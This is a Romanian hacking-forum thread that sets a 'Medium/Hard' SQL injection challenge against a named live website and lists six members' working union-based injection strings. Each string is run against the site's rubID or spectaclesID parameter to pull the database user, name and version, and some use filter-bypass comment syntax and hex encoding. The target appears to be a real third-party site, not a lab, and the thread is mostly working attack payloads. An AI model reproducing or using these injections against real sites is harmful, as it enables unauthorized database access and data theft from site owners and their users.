Jump to content
Wubi

[Medium/Hard]SQLi 4

Recommended Posts

Posted (edited)

Deci...

Target: LE POCHE

Metoda: Union Based

Cerinte: User(),Database() sau Version().

Proof:

88334820.png

Site-ul este gasit de Sheyken si mi`a venit apa`n gura pana mi`am dat seama ca nu era chiar atat de greu. :))

[TABLE=class: grid, width: 800]

[TR]

[TD]Solvers:[/TD]

[TD]Syntax:[/TD]

[/TR]

[TR]

[TD]Sheyken[/TD]

[TD]-

[/TD]

[/TR]

[TR]

[TD]kl0w[/TD]

[TD]?rubID=-2%20+/*!50000UnIoN*/%20/*!50000SeLeCt%20aLl*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat%280x5645525349554e4541,0x3a,version%28%29,0x3a,0x4d657273692070656e74727520636f6d70657469746965%20%29,17--

[/TD]

[/TR]

[TR]

[TD]Sweby

[/TD]

[TD]?rubID=2 and 1=0 UNION SELECT null,null,0x5377656279,0x3a292920416d206761736974206e656e6f726f63697461,null,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),null,null,null,null,null,null,null,null,null,null,null--+

[/TD]

[/TR]

[TR]

[TD]ak4d3a[/TD]

[TD]?rubID=2+and+1=2+UnIoN+SeLeCt+1,2,version(),User(),5,Database(),7,8,9,10,11,12,13,14,15,null,17--

[/TD]

[/TR]

[TR]

[TD]neo.hapsis[/TD]

[TD]?rubID=2+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(user(),database(),version()),17--

[/TD]

[/TR]

[TR]

[TD]gafi[/TD]

[TD]?rubID=2+AND+1=2+UNION+SELECT+concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version()),concat(user(),database(),version())--

[/TD]

[/TR]

[TR]

[TD]badluck[/TD]

[TD]?spectaclesID=36 UNION ALL SELECT concat(database(),0x3a,user(),0x3a,version()),2,3,4,5,6--

[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[TR]

[TD][/TD]

[TD]-[/TD]

[/TR]

[/TABLE]

Edited by Wubi
Posted
E ok, felicitari, nu`si avea rostul bypass-ul ala acolo, in rest e bine. :)

Da stiu ca nu are rost.

Dar am scris direct cu bypass in caz de trebuia sa nu mai schimb.L-am facut rapid .

Mersi oricum .

Guest
This topic is now closed to further replies.


×
×
  • Create New...